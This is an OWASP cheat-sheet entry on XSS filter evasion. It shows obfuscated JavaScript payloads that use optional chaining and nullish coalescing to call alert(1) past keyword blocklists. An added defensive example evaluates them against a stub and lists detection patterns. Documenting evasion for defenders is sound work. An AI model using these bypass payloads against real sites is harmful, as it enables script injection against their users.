OWASP XSS Filter Evasion Cheat Sheet - Filter Bypass Alert Obfuscation of Mixed Technique Obfuscation

Click to execute alert(1);

JavaScript source code: x=this?.[[]?.x??/a/.source+'\x6c'+13439..toString?.(30)],[1]?.findIndex?.(x);

Simple code


This is equivalent to alert(1);.

New technique

This technique combines the optional chaining operator (?.) with the nullish coalescing operator (??).
Although this is not what the operators were designed for, an expression that is intentionally made to return undefined lets the right-hand side of ?? supply the function or property to execute.
For example, code of the form "object?.undefined??function".
That is, the JavaScript code "this?.[[]?.x??/alert/.source]?.(1);" is equivalent to alert(1);.
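
An added example, not part of the original report: it evaluates the page's name-building expression against a stub object (so nothing pops up) and compares what a keyword blocklist sees with what the engine resolves. The function names, the blocklist and the list of structural signals are assumptions made for illustration.

```javascript
// The two expressions quoted on this page, held as inert strings (never evaluated).
const SIMPLE = String.raw`this?.[[]?.x??/alert/.source]?.(1);`;
const MIXED = String.raw`x=this?.[[]?.x??/a/.source+'\x6c'+13439..toString?.(30)],[1]?.findIndex?.(x);`;

// Hypothetical keyword blocklist of the kind this obfuscation is aimed at.
function keywordFilter(input) {
  return /\b(alert|prompt|confirm|eval)\b/i.test(input);
}

// The name-building sub-expression from the page, evaluated on its own.
// []?.x is undefined, so ?? falls through to the right-hand side:
// /a/.source -> "a", '\x6c' -> "l", 13439 in base 30 -> "ert".
function decodeName() {
  return []?.x ?? /a/.source + '\x6c' + 13439..toString?.(30);
}

// Same lookup-and-call shape as the page, run against a stub object instead
// of the browser global. Returns the first argument the stub received.
function callThroughStub() {
  const seen = [];
  const scope = { alert: (...args) => { seen.push(args[0]); } };
  const x = scope?.[decodeName()];
  [1]?.findIndex?.(x); // findIndex invokes x(element, index, array)
  return seen;
}

// Structural signals (assumed list) that survive renaming of the keyword:
// useful for triaging logged input, not as a blocking control.
function structuralSignals(input) {
  const patterns = {
    optionalComputedAccess: /\?\.\[/,
    optionalCall: /\?\.\(/,
    nullishFallback: /\?\?/,
    regexSource: /\/[^\/\n]+\/\.source/,
    radixToString: /\.toString\??\.?\(\s*\d+\s*\)/,
  };
  return Object.keys(patterns).filter((k) => patterns[k].test(input));
}
```

The keyword filter catches the simple form but not the mixed one, while both resolve to the same call, which is why input reaching a script context needs context-aware output encoding and cannot be handled by keyword matching.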

Research report by Tsubasa FUJII (@reinforchu).